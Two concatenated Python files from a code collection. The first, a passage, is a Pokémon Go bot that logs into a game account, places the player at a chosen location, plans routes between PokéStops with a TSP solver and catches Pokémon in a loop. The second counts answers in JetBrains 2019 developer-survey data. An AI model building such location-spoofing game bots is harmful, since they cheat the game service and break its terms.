plt.title('Estimated number of clusters: %d' % n_clusters_)
# plt.show()
ret = []
for i in range(len(_k)):
if _k[i]:
ret.append(self.lst[i])
return ret
class TSP(object):
"""Create callback to calculate distances between points."""
def __init__(self, lst):
self.lst = lst
self.tsp_size = len(lst)
self.matrix = {}
for from_node in range(len(lst)):
self.matrix[from_node] = {}
for to_node in range(len(lst)):
if from_node == to_node:
self.matrix[from_node][to_node] = 0
else:
a = (lst[from_node]['latitude'], lst[from_node]['longitude'])
b = (lst[to_node]['latitude'], lst[to_node]['longitude'])
self.matrix[from_node][to_node] = great_circle(a, b).meters
def distance(self, from_node, to_node):
return self.matrix[from_node][to_node]
def solve(self):
if self.tsp_size <= 0:
return []
routing = pywrapcp.RoutingModel(self.tsp_size, 1)
callback = self.distance
routing.SetArcCostEvaluatorOfAllVehicles(callback)
assignment = routing.Solve()
if assignment:
print "TSP: total dist =", assignment.ObjectiveValue()
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
route_number = 0
index = routing.Start(route_number) # Index of the variable for the starting node.
index = routing.Start(0)
ret = []
sys.stdout.write('TSP: ')
while not routing.IsEnd(index):
ret.append(self.lst[routing.IndexToNode(index)])
next_index = assignment.Value(routing.NextVar(index))
dist = int(self.distance(routing.IndexToNode(index), routing.IndexToNode(next_index)))
sys.stdout.write(str(dist) + ' -> ')
index = next_index
ret.append(self.lst[routing.IndexToNode(index)])
print ''
return ret
else:
print 'TSP: no solution.'
def get_pos_by_name(location_name):
geolocator = GoogleV3()
while True:
try:
loc = geolocator.geocode(location_name)
break
except:
print "geolocator err, retry after 3s"
time.sleep(3)
log.info('Your given location: %s', loc.address.encode('utf-8'))
log.info('lat/long/alt: %s %s %s', loc.latitude, loc.longitude, loc.altitude)
return (loc.latitude, loc.longitude)
def init_config():
parser = argparse.ArgumentParser()
config_file = "config.json"
# If config file exists, load variables from json
load = {}
if os.path.isfile(config_file):
with open(config_file) as data:
load.update(json.load(data))
# Read passed in Arguments
required = lambda x: not x in load
parser.add_argument("-a", "--auth_service", help="Auth Service ('ptc' or 'google')",
required=required("auth_service"))
parser.add_argument("-u", "--username", help="Username", required=required("username"))
parser.add_argument("-p", "--password", help="Password")
parser.add_argument("-l", "--location", help="Location", required=required("location"))
parser.add_argument("-d", "--debug", help="Debug Mode", action='store_true')
parser.add_argument("-t", "--test", help="Only parse the specified location", action='store_true')
parser.set_defaults(DEBUG=False, TEST=False)
config = parser.parse_args()
# Passed in arguments shoud trump
for key in config.__dict__:
if key in load and config.__dict__[key] == None:
config.__dict__[key] = load[key]
# Get password fron stdin if no exist
if config.__dict__['password'] is None:
config.__dict__['password'] = get<PASSWORD>pass('Password:')
if config.auth_service not in ['ptc', 'google']:
log.error("Invalid Auth service specified! ('ptc' or 'google')")
return None
return config
def show_map(pokestops, wild_pokemons):
url_string = 'http://maps.googleapis.com/maps/api/staticmap?size=2048x2048&path=color:red|weight:1|'
for pokestop in pokestops: # client.get_pokestop():
url_string += '{},{}|'.format(pokestop['latitude'], pokestop['longitude'])
url_string=url_string[:-1]
if len(pokestops):
url_string += '&markers={},{}'.format(pokestops[0]['latitude'], pokestops[0]['longitude'])
if len(wild_pokemons):
for wild_pokemon in wild_pokemons:
url_string += '&markers={},{}'.format(wild_pokemon['latitude'], wild_pokemon['longitude'])
print(url_string)
webbrowser.open(url_string)
def main():
# logging.getLogger("requests").setLevel(logging.DEBUG)
# logging.getLogger("pgoapi").setLevel(logging.DEBUG)
# logging.getLogger("rpc_api").setLevel(logging.DEBUG)
config = init_config()
if not config:
return
if config.debug:
consoleHandler.setLevel(logging.DEBUG)
rootLogger.addHandler(consoleHandler)
# provide player position on the earth
position = get_pos_by_name(config.location)
if config.test:
return
################################################ Actual
auth_token = None
try:
with open("token.txt", "r") as f:
auth_token = f.read().strip()
except:
pass
#######################################################
start_time = time.time()
start_exp = 0
start_pokemon = 0
start_pokestop = 0
evolve = False
evolve_list = [ ]
map_showed = False
while True:
client = Client()
client.jump_to(*position)
try:
if not client.login(str(config.auth_service), str(config.username), str(config.password), auth_token=auth_token):
print 'Login failed, retry after 30s'
time.sleep(30)
continue
client.scan().summary().summary_pokemon()
# client.use_item_xp_boost()
# client.scan().bulk_release_pokemon()
# client.scan().bulk_evolve_pokemon(dry=False)
# client.scan().bulk_evolve_pokemon(dry=False)
# exit(1)
if start_exp == 0:
start_exp = client.profile['experience']
start_pokemon = client.profile['pokemons_captured']
start_pokestop = client.profile['poke_stop_visits']
# if evolve:
# client.bulk_evolve_pokemon(dry=False)
# for pokemon_id in evolve_list:
# client.manual_evolve_pokemon(pokemon_id, dry=False)
clustered_pokestops = Cluster(client.get_pokestop()).solve()
sorted_pokestops = TSP(clustered_pokestops).solve()
if not map_showed:
show_map(sorted_pokestops, [])
map_showed = True
for pokestop in sorted_pokestops:
client.move_to_pokestop_catch(pokestop).status()
time_delta = time.time() - start_time
exp_delta = client.profile['experience'] - start_exp
print 'SEC = %d, POKEMON = %d, POKESTOP = %d, EFFICIENCY = %.2f Exp/Hour' % (
time_delta,
client.profile['pokemons_captured'] - start_pokemon,
client.profile['poke_stop_visits'] - start_pokestop,
float(exp_delta) / time_delta * 3600)
except NotLoggedInException:
if auth_token is not None:
print 'Token login failed, use password'
auth_token = None
print 'NotLoggedInException, continue'
continue
except KeyboardInterrupt:
break
except SystemExit:
break
except:
exc_info = sys.exc_info()
traceback.print_exception(*exc_info)
# exit(1)
continue
print 'Loop finished, sleep for 10s'
time.sleep(10)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1624857 | import json
from pyjetbrainsdevecosystem.data_import_utils import unpack_csv_data
questions_dict = {}
with open('survey_data/2019/DevEcosystem 2019 questions_outside.csv',
encoding='utf8') as questions_text:
questions_reader = unpack_csv_data(questions_text)
questions_fieldnames = questions_reader.fieldnames
for column in questions_reader:
questions_dict.update(
{
column['shortname']:
{
column['question_title'],
column['type'],
column['page'],
column['place']
}
}
)
question_column_map = {}
with open('survey_data/2019/sharing_data_outside2019.csv',
newline='',
encoding='utf8') as survey_text:
survey_reader = unpack_csv_data(survey_text)
survey_fieldnames = survey_reader.fieldnames
for question in questions_dict.keys():
field_list_with_position = {}
for field_name in survey_fieldnames:
if field_name.find(question) == 0:
column_number = survey_fieldnames.index(field_name)
field_list_with_position.update({field_name: column_number})
question_column_map.update({question: field_list_with_position})
entry_count = {}
for response in survey_reader:
response_data = {}
question_row = question_column_map.items()
for parent_question, column_name_dict in question_row:
temp_dict = {}
sub_entry_count = entry_count.get(parent_question, {})
for column_name in column_name_dict:
column_name: str
temp_dict.update({column_name: response[column_name]})
sub_entry_count[response[column_name]] = sub_entry_count.get(response[column_name], 0) + 1
response_data.update({parent_question: temp_dict})
entry_count.update({parent_question: sub_entry_count})
print(json.dumps(entry_count, indent=4))
#print(json.dumps(question_column_map, indent=4))
# {
# "os_devenv": {
# "os_devenv.Windows": 19,
# "os_devenv.Unix / Linux": 20,
# "os_devenv.macOS": 21,
# "os_devenv.Other": 22
# },
# "app_type_money": {
# "app_type_money.I don't develop anything for money": 23,
# "app_type_money.Web Back-end": 24,
# "app_type_money.Web Front-end": 25,
# "app_type_money.Mobile applications": 26,
# "app_type_money.Desktop": 27,
# "app_type_money.Data analysis": 28,
# "app_type_money.BI": 29,
# "app_type_money.Machine learning": 30,
# "app_type_money.Libraries / Frameworks": 31,
# "app_type_money.Embedded / IoT": 32,
# "app_type_money.Games": 33,
# "app_type_money.Other Back-end": 34,
# "app_type_money.Other": 35
# },
# "dev_for_mobile_os": {
# "dev_for_mobile_os.Android": 76,
# "dev_for_mobile_os.iOS": 77,
# "dev_for_mobile_os.Other": 78
# },
# "db_adopt": {
# "db_adopt.No, not planning to adopt / migrate": 270,
# "db_adopt.Yes, planning to adopt / migrate to other database(s) - Write in": 271,
# "db_adopt.DB2": 272,
# "db_adopt.MS SQL Server": 273,
# "db_adopt.MySQL": 274,
# "db_adopt.Oracle Database": 275,
# "db_adopt.PostgreSQL": 276,
# "db_adopt.SQLite": 277,
# "db_adopt.Cassandra": 278,
# "db_adopt.Couchbase": 279,
# "db_adopt.HBase": 280,
# "db_adopt.MongoDB": 281,
# "db_adopt.Neo4j": 282,
# "db_adopt.Redis": 283,
# "db_adopt.Amazon Redshift": 284,
# "db_adopt.H2": 285,
# "db_adopt.MariaDB": 286,
# "db_adopt.ClickHouse": 287,
# "db_adopt.Other": 288
# },
# "proglang": {
# "proglang.I don't use programming languages": 97,
# "proglang.Java": 98,
# "proglang.C": 99,
# "proglang.C++": 100,
# "proglang.Python": 101,
# "proglang.C#": 102,
# "proglang.PHP": 103,
# "proglang.JavaScript": 104,
# "proglang.Ruby": 105,
# "proglang.Elixir": 106,
# "proglang.Crystal": 107,
# "proglang.Kotlin": 108,
# "proglang.Swift": 109,
# "proglang.Objective-C": 110,
# "proglang.Visual Basic": 111,
# "proglang.Scala": 112,
# "proglang.Go": 113,
# "proglang.HTML / CSS": 114,
# "proglang.Haskell": 115,
# "proglang.R": 116,
# "proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 117,
# "proglang.TypeScript": 118,
# "proglang.Dart": 119,
# "proglang.CoffeeScript": 120,
# "proglang.Clojure / ClojureScript": 121,
# "proglang.Delphi": 122,
# "proglang.Cobol": 123,
# "proglang.Groovy": 124,
# "proglang.Rust": 125,
# "proglang.Perl": 126,
# "proglang.Assembly": 127,
# "proglang.Matlab": 128,
# "proglang.Lua": 129,
# "proglang.Shell scripting languages(bash/shell/powershell)": 130,
# "proglang.Julia": 131,
# "proglang.F#": 132,
# "proglang.Other": 133,
# "proglang_rank.Java": 208,
# "proglang_rank.C": 209,
# "proglang_rank.C++": 210,
# "proglang_rank.Python": 211,
# "proglang_rank.C#": 212,
# "proglang_rank.PHP": 213,
# "proglang_rank.JavaScript": 214,
# "proglang_rank.Ruby": 215,
# "proglang_rank.Kotlin": 216,
# "proglang_rank.Swift": 217,
# "proglang_rank.Objective-C": 218,
# "proglang_rank.Scala": 219,
# "proglang_rank.Go": 220,
# "proglang_rank.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 221,
# "proglang_rank.Rust": 222,
# "proglang_rank.Haskell": 223,
# "proglang_rank.HTML / CSS": 224,
# "proglang_rank.Elixir": 225,
# "proglang_rank.Crystal": 226,
# "proglang_rank.Visual Basic": 227,
# "proglang_rank.R": 228,
# "proglang_rank.TypeScript": 229,
# "proglang_rank.Dart": 230,
# "proglang_rank.CoffeeScript": 231,
# "proglang_rank.Clojure / ClojureScript": 232,
# "proglang_rank.Delphi": 233,
# "proglang_rank.Cobol": 234,
# "proglang_rank.Groovy": 235,
# "proglang_rank.Perl": 236,
# "proglang_rank.Assembly": 237,
# "proglang_rank.Matlab": 238,
# "proglang_rank.Lua": 239,
# "proglang_rank.Shell scripting languages(bash/shell/powershell)": 240,
# "proglang_rank.Julia": 241,
# "proglang_rank.F#": 242,
# "proglang_rank.Other": 243
# },
# "tools_ci": {
# "tools_ci.Jenkins / Hudson": 463,
# "tools_ci.TeamCity": 464,
# "tools_ci.Bamboo": 465,
# "tools_ci.Microsoft Team Foundation Build": 466,
# "tools_ci.Travis CI": 467,
# "tools_ci.Codeship": 468,
# "tools_ci.CircleCI": 469,
# "tools_ci.CruiseControl": 470,
# "tools_ci.GoCD": 471,
# "tools_ci.Gitlab CI": 472,
# "tools_ci.Microsoft TFS / Visual Studio Team Services": 473,
# "tools_ci.AppVeyor": 474,
# "tools_ci.Drone": 475,
# "tools_ci.Semaphore CI": 476,
# "tools_ci.Other": 477
# },
# "tools_it": {
# "tools_it.Jira": 478,
# "tools_it.YouTrack": 479,
# "tools_it.Redmine": 480,
# "tools_it.GitLab Issue Board": 481,
# "tools_it.Asana": 482,
# "tools_it.Microsoft TFS / Visual Studio Team Services": 483,
# "tools_it.Trello": 484,
# "tools_it.GitHub Issues": 485,
# "tools_it.Other": 486
# },
# "tools_vcs": {
# "tools_vcs.None": 492,
# "tools_vcs.Concurrent Versions System (CVS)": 493,
# "tools_vcs.Apache Subversion (SVN)": 494,
# "tools_vcs.Git": 495,
# "tools_vcs.Mercurial": 496,
# "tools_vcs.Perforce": 497,
# "tools_vcs.Visual Studio Team Services (VSTS)": 498,
# "tools_vcs.Microsoft TFS": 499,
# "tools_vcs.Other": 500
# },
# "contribute_os": {
# "contribute_os.I work full time on open-source code and get paid for it": 1577,
# "contribute_os.I work full time on open-source code but do not get paid for it": 1578,
# "contribute_os.Yes, regularly (at least once a month)": 1579,
# "contribute_os.Yes, from time to time (several times a year)": 1580,
# "contribute_os.Only contributed a few times": 1581,
# "contribute_os.No, but I would like to": 1582,
# "contribute_os.No, and I would not like to": 1583
# },
# "hours_code_job": {
# "hours_code_job": 1569
# },
# "tools_adopted": {
# "tools_adopted.Source code collaboration tool (e_g_ GitHub, GitLab, Bitbucket)": 454,
# "tools_adopted.Issue tracker (e_g_ Jira, YouTrack)": 455,
# "tools_adopted.Code review tool (e_g_ Crucible, Upsource)": 456,
# "tools_adopted.Continuous Integration (CI) or Continuous Delivery (CD) tool (e_g_ Jenkins, TeamCity)": 457,
# "tools_adopted.Static analysis tool (e_g_ CodeClimate)": 458,
# "tools_adopted.Standalone IDE (e_g_ Eclipse, IntelliJ IDEA)": 459,
# "tools_adopted.None": 460,
# "tools_adopted.Lightweight Desktop Editor (e_g_ Sublime Text, Atom, VS Code, Vim)": 461,
# "tools_adopted.In-cloud Editor or IDE": 462
# },
# "unittests_how": {
# "unittests_how.I write unit tests": 249,
# "unittests_how.I use unit tests, but I don't write them": 250
# },
# "team_size": {
# "team_size": 1713
# },
# "advocate": {
# "advocate": 1712
# },
# "team_distributed": {
# "team_distributed": 1721
# },
# "java_version": {
# "java_version.Java 11": 527,
# "java_version.Java 10": 528,
# "java_version.Java 9": 529,
# "java_version.Java 8": 530,
# "java_version.Java 7": 531,
# "java_version.Java 6": 532,
# "java_version.Other": 533
# },
# "java_app_server": {
# "java_app_server.None": 534,
# "java_app_server.Apache Tomcat": 535,
# "java_app_server.Jetty": 536,
# "java_app_server.WildFly": 537,
# "java_app_server.JBoss EAP": 538,
# "java_app_server.WebLogic": 539,
# "java_app_server.WebSphere": 540,
# "java_app_server.Liberty": 541,
# "java_app_server.GlassFish": 542,
# "java_app_server.Payara": 543,
# "java_app_server.Other": 544
# },
# "java_app_frameworks": {
# "java_app_frameworks.None": 545,
# "java_app_frameworks.Netty": 546,
# "java_app_frameworks.Undertow": 547,
# "java_app_frameworks.Vert_x": 548,
# "java_app_frameworks.Spark Java": 549,
# "java_app_frameworks.Spring Boot": 550,
# "java_app_frameworks.Other": 551
# },
# "java_package": {
# "java_package.As artifacts (e_g_ WAR)": 552,
# "java_package.I use an embedded server (e_g_ JAR)": 553,
# "java_package.I'm not sure": 554
# },
# "java_web_frameworks": {
# "java_web_frameworks.None": 563,
# "java_web_frameworks.Spring MVC": 564,
# "java_web_frameworks.GWT": 565,
# "java_web_frameworks.Vaadin": 566,
# "java_web_frameworks.Play Framework": 567,
# "java_web_frameworks.Grails 2": 568,
# "java_web_frameworks.Grails 3": 569,
# "java_web_frameworks.Spring Boot": 570,
# "java_web_frameworks.JSF": 571,
# "java_web_frameworks.Struts 1": 572,
# "java_web_frameworks.Struts 2": 573,
# "java_web_frameworks.Wicket": 574,
# "java_web_frameworks.Dropwizard": 575,
# "java_web_frameworks.Other": 576
# },
# "java_buildsystem": {
# "java_buildsystem.None": 577,
# "java_buildsystem.Maven": 578,
# "java_buildsystem.sbt": 579,
# "java_buildsystem.Gradle": 580,
# "java_buildsystem.Ant": 581,
# "java_buildsystem.Bazel": 582,
# "java_buildsystem.Other": 583
# },
# "company_size": {
# "company_size.Just me": 1649,
# "company_size.2-10": 1650,
# "company_size.11-50": 1651,
# "company_size.51-500": 1652,
# "company_size.501-1,000": 1653,
# "company_size.1,001-5,000": 1654,
# "company_size.More than 5,000": 1655,
# "company_size.Not sure": 1656
# },
# "job_role": {
# "job_role.Developer / Programmer / Software Engineer": 1,
# "job_role.DevOps Engineer / Infrastructure Developer / etc_": 2,
# "job_role.DBA": 3,
# "job_role.Architect": 4,
# "job_role.Tester / QA Engineer": 5,
# "job_role.Technical support": 6,
# "job_role.Data analyst / Data engineer/ Data scientist": 7,
# "job_role.Business analyst": 8,
# "job_role.Team Lead": 9,
# "job_role.Systems analyst": 10,
# "job_role.Product Manager": 11,
# "job_role.UX / UI Designer": 12,
# "job_role.CIO / CEO / CTO": 13,
# "job_role.Marketing Manager": 14,
# "job_role.Developer Advocate": 15,
# "job_role.Instructor / Teacher / Tutor / etc_": 16,
# "job_role.Other": 17
# },
# "country": {
# "country": 1736
# },
# "age_range": {
# "age_range.17 or younger": 1729,
# "age_range.18-20": 1730,
# "age_range.21-29": 1731,
# "age_range.30-39": 1732,
# "age_range.40-49": 1733,
# "age_range.50-59": 1734,
# "age_range.60 or older": 1735
# },
# "adopt_proglang": {
# "adopt_proglang.No, not planning to adopt / migrate": 170,
# "adopt_proglang.Planning to adopt / migrate to other language(s) - Write in": 171,
# "adopt_proglang.Java": 172,
# "adopt_proglang.C": 173,
# "adopt_proglang.C++": 174,
# "adopt_proglang.Python": 175,
# "adopt_proglang.C#": 176,
# "adopt_proglang.PHP": 177,
# "adopt_proglang.JavaScript": 178,
# "adopt_proglang.Ruby": 179,
# "adopt_proglang.Elixir": 180,
# "adopt_proglang.Crystal": 181,
# "adopt_proglang.Kotlin": 182,
# "adopt_proglang.Swift": 183,
# "adopt_proglang.Objective-C": 184,
# "adopt_proglang.Visual Basic": 185,
# "adopt_proglang.Scala": 186,
# "adopt_proglang.Go": 187,
# "adopt_proglang.HTML / CSS": 188,
# "adopt_proglang.Haskell": 189,
# "adopt_proglang.R": 190,
# "adopt_proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 191,
# "adopt_proglang.TypeScript": 192,
# "adopt_proglang.Dart": 193,
# "adopt_proglang.CoffeeScript": 194,
# "adopt_proglang.Clojure / ClojureScript": 195,
# "adopt_proglang.Delphi": 196,
# "adopt_proglang.Cobol": 197,
# "adopt_proglang.Groovy": 198,
# "adopt_proglang.Rust": 199,
# "adopt_proglang.Ceylon": 200,
# "adopt_proglang.Perl": 201,
# "adopt_proglang.Assembly": 202,
# "adopt_proglang.Matlab": 203,
# "adopt_proglang.Lua": 204,
# "adopt_proglang.Shell scripting languages(bash/shell/powershell)": 205,
# "adopt_proglang.Julia": 206,
# "adopt_proglang.F#": 207
# },
# "cloud_services": {
# "cloud_services.Amazon Web Services": 1548,
# "cloud_services.Microsoft Azure": 1549,
# "cloud_services.Google Cloud Platform": 1550,
# "cloud_services.Rackspace": 1551,
# "cloud_services.RedHat OpenShift": 1552,
# "cloud_services.IBM SoftLayer": 1553,
# "cloud_services.Cloud Foundry": 1554,
# "cloud_services.Heroku": 1555,
# "cloud_services.Other": 1556
# },
# "tools_cloud": {
# "tools_cloud.None": 487,
# "tools_cloud.Continuous Integration tool": 488,
# "tools_cloud.Continuous Delivery tool": 489,
# "tools_cloud.Code Review tool": 490,
# "tools_cloud.Issue Tracker": 491
# },
# "where_sources": {
# "where_sources.Version control as a service (e_g_ GitHub, Bitbucket)": 501,
# "where_sources.Manually deployed version control (e_g_ GitHub Enterprise, GitLab)": 502,
# "where_sources.Other": 503
# },
# "vc_service": {
# "vc_service.None": 504,
# "vc_service.GitHub": 505,
# "vc_service.GitLab": 506,
# "vc_service.Bitbucket": 507,
# "vc_service.Perforce": 508,
# "vc_service.Amazon CodeCommit": 509,
# "vc_service.SourceForge": 510,
# "vc_service.Custom tool": 511,
# "vc_service.Microsoft TFS / Visual Studio Team Services": 512,
# "vc_service.Other": 513
# },
# "ide_customise": {
# "ide_customise.No": 520,
# "ide_customise.Yes, I use custom color schemes": 521,
# "ide_customise.Yes, I use custom keymaps": 522,
# "ide_customise.Yes, I use plugins": 523,
# "ide_customise.Other": 524
# },
# "java_ee": {
# "java_ee.None": 584,
# "java_ee.Java EE 8": 585,
# "java_ee.Java EE 7": 586,
# "java_ee.Java EE 6": 587,
# "java_ee.Java EE 5": 588,
# "java_ee.J2SE": 589,
# "java_ee.Other": 590
# },
# "java_profiler": {
# "java_profiler.None": 591,
# "java_profiler.VisualVM": 592,
# "java_profiler.JProfiler": 593,
# "java_profiler.Java Mission Control": 594,
# "java_profiler.YourKit": 595,
# "java_profiler.NetBeans profiler": 596,
# "java_profiler.Honest profiler": 597,
# "java_profiler.async-profiler": 598,
# "java_profiler.Own custom tools": 599,
# "java_profiler.Other": 600
# },
# "java_ide": {
# "java_ide": 601
# },
# "c_standart": {
# "c_standart.C99": 602,
# "c_standart.C11": 603,
# "c_standart.Embedded C": 604,
# "c_standart.Other": 605
# },
# "c_ide": {
# "c_ide": 606
# },
# "c_unittesting": {
# "c_unittesting.None": 607,
# "c_unittesting.Catch": 608,
# "c_unittesting.Boost_Test": 609,
# "c_unittesting.Google Test": 610,
# "c_unittesting.CppUnit": 611,
# "c_unittesting.CppUTest": 612,
# "c_unittesting.CUnit": 613,
# "c_unittesting.Unity": 614,
# "c_unittesting.Other": 615
# },
# "c_projectmodels": {
# "c_projectmodels.None": 616,
# "c_projectmodels.Visual Studio project": 617,
# "c_projectmodels.Xcode project": 618,
# "c_projectmodels.Autotools": 619,
# "c_projectmodels.Makefiles": 620,
# "c_projectmodels.CMake": 621,
# "c_projectmodels.Qmake": 622,
# "c_projectmodels.Custom": 623,
# "c_projectmodels.Other": 624
# },
# "c_compilers": {
# "c_compilers.GCC": 632,
# "c_compilers.Clang": 633,
# "c_compilers.MSVC": 634,
# "c_compilers.Intel": 635,
# "c_compilers.Compiler for microcontrollers (like Keil, C51 C Compiler, IAR, etc_)": 636,
# "c_compilers.Custom": 637,
# "c_compilers.Other": 638
# },
# "cpp_standart": {
# "cpp_standart.C++98": 639,
# "cpp_standart.C++03": 640,
# "cpp_standart.C++11": 641,
# "cpp_standart.C++14": 642,
# "cpp_standart.C++17": 643,
# "cpp_standart_migrate.No, I don't plan to": 644,
# "cpp_standart_migrate.C++98": 645,
# "cpp_standart_migrate.C++11": 646,
# "cpp_standart_migrate.C++14": 647,
# "cpp_standart_migrate.\u0421++17": 648
# },
# "cpp_standart_migrate": {
# "cpp_standart_migrate.No, I don't plan to": 644,
# "cpp_standart_migrate.C++98": 645,
# "cpp_standart_migrate.C++11": 646,
# "cpp_standart_migrate.C++14": 647,
# "cpp_standart_migrate.\u0421++17": 648
# },
# "cpp_ide": {
# "cpp_ide.Visual Studio": 651,
# "cpp_ide.Visual Studio Code": 652,
# "cpp_ide.NetBeans": 653,
# "cpp_ide.Eclipse CDT": 654,
# "cpp_ide.QtCreator": 655,
# "cpp_ide.CLion": 656,
# "cpp_ide.Xcode": 657,
# "cpp_ide.Atom": 658,
# "cpp_ide.Sublime": 659,
# "cpp_ide.Vi/Vim": 660,
# "cpp_ide.Emacs": 661,
# "cpp_ide.Other": 662
# },
# "cpp_unittesting": {
# "cpp_unittesting.None": 663,
# "cpp_unittesting.Boost_Test": 664,
# "cpp_unittesting.Google Test": 665,
# "cpp_unittesting.CppUnit": 666,
# "cpp_unittesting.CppUTest": 667,
# "cpp_unittesting.Catch": 668,
# "cpp_unittesting.Other": 669
# },
# "cpp_projectmodels": {
# "cpp_projectmodels.None": 678,
# "cpp_projectmodels.Visual Studio project": 679,
# "cpp_projectmodels.Xcode project": 680,
# "cpp_projectmodels.Autotools": 681,
# "cpp_projectmodels.Makefiles": 682,
# "cpp_projectmodels.CMake": 683,
# "cpp_projectmodels.Qmake": 684,
# "cpp_projectmodels.SCons": 685,
# "cpp_projectmodels.Boost_Build": 686,
# "cpp_projectmodels.Bazel": 687,
# "cpp_projectmodels.Custom": 688,
# "cpp_projectmodels.Other": 689
# },
# "cpp_compilers": {
# "cpp_compilers.GCC": 690,
# "cpp_compilers.Clang": 691,
# "cpp_compilers.MSVC": 692,
# "cpp_compilers.Intel": 693,
# "cpp_compilers.Custom": 694,
# "cpp_compilers.Other": 695
# },
# "cpp_cli": {
# "cpp_cli.Yes": 649,
# "cpp_cli.No": 650
# },
# "cpp_project_size": {
# "cpp_project_size.Small / Medium projects with most commonly used C++ (C++11) features": 723,
# "cpp_project_size.Small / Medium projects with heavy use of templates/variadic templates and other C++11/14/17 features": 724,
# "cpp_project_size.Big / Huge projects with many lines of code, libraries, etc_ but only using the most common C++ (C++11) features": 725,
# "cpp_project_size.Big / Huge projects with many lines of code, libraries, etc_, with heavy use of templates/variadic templates, and other C++11/14/17 features": 726,
# "cpp_project_size.Other": 727
# },
# "python_vesion": {
# "python_vesion.Python 2": 728,
# "python_vesion.Python 3": 729
# },
# "python_ide": {
# "python_ide.PyCharm Professional Edition": 790,
# "python_ide.PyCharm Community Edition": 791,
# "python_ide.VS Code": 792,
# "python_ide.Sublime Text": 793,
# "python_ide.Vim": 794,
# "python_ide.IntelliJ IDEA": 795,
# "python_ide.Atom": 796,
# "python_ide.Emacs": 797,
# "python_ide.Eclipse + Pydev": 798,
# "python_ide.IPython Notebook": 799,
# "python_ide.Jupyter Notebook": 800,
# "python_ide.NotePad++": 801,
# "python_ide.Spyder": 802,
# "python_ide.IDLE": 803,
# "python_ide.Other": 804
# },
# "csharp_version": {
# "csharp_version.C# 5 (async / await, caller info attributes)": 805,
# "csharp_version.C# 6 (? and nameof operators, static imports, exception filters, Roslyn)": 806,
# "csharp_version.C# 7 (pattern matching, local functions, ref locals and returns, out variables)": 807,
# "csharp_version.An earlier version": 808,
# "csharp_version.I'm not sure": 809
# },
# "csharp_runtimes": {
# "csharp_runtimes._NET Framework": 810,
# "csharp_runtimes.Mono": 811,
# "csharp_runtimes._NET Core": 812
# },
# "csharp_frameworks": {
# "csharp_frameworks.None": 813,
# "csharp_frameworks.Sharepoint": 814,
# "csharp_frameworks.ASP_NET MVC": 815,
# "csharp_frameworks.ASP_NET Web Forms": 816,
# "csharp_frameworks.ASP_NET Core": 817,
# "csharp_frameworks.Windows Presentation Foundation (WPF)": 818,
# "csharp_frameworks.Windows Forms": 819,
# "csharp_frameworks.Windows Communication Foundation (WCF)": 820,
# "csharp_frameworks.Entity Framework": 821,
# "csharp_frameworks.Unity3d": 822,
# "csharp_frameworks.Xamarin": 823,
# "csharp_frameworks.UWP": 824,
# "csharp_frameworks.Azure": 825,
# "csharp_frameworks.Other": 826
# },
# "csharp_ide": {
# "csharp_ide": 827
# },
# "csharp_vsversion": {
# "csharp_vsversion": 850
# },
# "csharp_unittesting": {
# "csharp_unittesting.None": 852,
# "csharp_unittesting.MSTest/Visual Studio Unit Testing Framework": 853,
# "csharp_unittesting.MSTest V2": 854,
# "csharp_unittesting.NUnit": 855,
# "csharp_unittesting.xUnit": 856,
# "csharp_unittesting.Other": 857
# },
# "csharp_performance": {
# "csharp_performance.None": 858,
# "csharp_performance.PerfView": 859,
# "csharp_performance.Intel VTune Amplifier": 860,
# "csharp_performance.SciTech _NET memory profiler": 861,
# "csharp_performance.Windows Performance Toolkit": 862,
# "csharp_performance.Visual Studio's built-in performance and diagnostic tools": 863,
# "csharp_performance.dotTrace": 864,
# "csharp_performance.dotMemory": 865,
# "csharp_performance.ANTS Profiler": 866,
# "csharp_performance.Other": 867
# },
# "php_version": {
# "php_version.PHP 7_3": 873,
# "php_version.PHP 7_2": 874,
# "php_version.PHP 7_1": 875,
# "php_version.PHP 7_0": 876,
# "php_version.PHP 5_6": 877,
# "php_version.PHP 5_5": 878,
# "php_version.PHP 5_4": 879,
# "php_version.PHP 5_3": 880,
# "php_version.Other": 881
# },
# "php_devenviron": {
# "php_devenviron.Local": 882,
# "php_devenviron.Remote (SFTP, SSH, Remote desktop, etc_)": 883,
# "php_devenviron.Virtualized (Vagrant, Otto, etc_)": 884,
# "php_devenviron.Containerized (Docker, Rocket)": 885,
# "php_devenviron.Other": 886
# },
# "php_debugger": {
# "php_debugger": 887
# },
# "php_ide": {
# "php_ide.Atom": 901,
# "php_ide.Eclipse PDT": 902,
# "php_ide.NetBeans IDE": 903,
# "php_ide.Notepad++": 904,
# "php_ide.PHPEdit": 905,
# "php_ide.PhpStorm": 906,
# "php_ide.Sublime Text": 907,
# "php_ide.Vim": 908,
# "php_ide.VS Code": 909,
# "php_ide.IntelliJ IDEA Ultimate with PHP plugin": 910,
# "php_ide.Other": 911
# },
# "php_testing": {
# "php_testing.None": 912,
# "php_testing.PHPUnit": 913,
# "php_testing.Behat": 914,
# "php_testing.PHPSpec": 915,
# "php_testing.Codeception": 916,
# "php_testing.Atoum": 917,
# "php_testing.SimpleTest": 918,
# "php_testing.Other": 919
# },
# "js_frameworks": {
# "js_frameworks.None": 1231,
# "js_frameworks.AngularJS": 1232,
# "js_frameworks.Angular": 1233,
# "js_frameworks.React": 1234,
# "js_frameworks.React Native": 1235,
# "js_frameworks.Cordova / PhoneGap": 1236,
# "js_frameworks.Express": 1237,
# "js_frameworks.Vue_js": 1238,
# "js_frameworks.Meteor": 1239,
# "js_frameworks.Ember": 1240,
# "js_frameworks.Backbone": 1241,
# "js_frameworks.Polymer": 1242,
# "js_frameworks.Electron": 1243,
# "js_frameworks.Other": 1244
# },
# "js_ide": {
# "js_ide.WebStorm (or another JetBrains IDE)": 1245,
# "js_ide.Sublime Text": 1246,
# "js_ide.Atom": 1247,
# "js_ide.VS Code": 1248,
# "js_ide.Vi / Vim": 1249,
# "js_ide.Visual Studio": 1250,
# "js_ide.NotePad++": 1251,
# "js_ide.Emacs": 1252,
# "js_ide.Other": 1253
# },
# "js_unittesting": {
# "js_unittesting.None": 1254,
# "js_unittesting.Mocha": 1255,
# "js_unittesting.Jest": 1256,
# "js_unittesting.Ava": 1257,
# "js_unittesting.Karma": 1258,
# "js_unittesting.Jasmine": 1259,
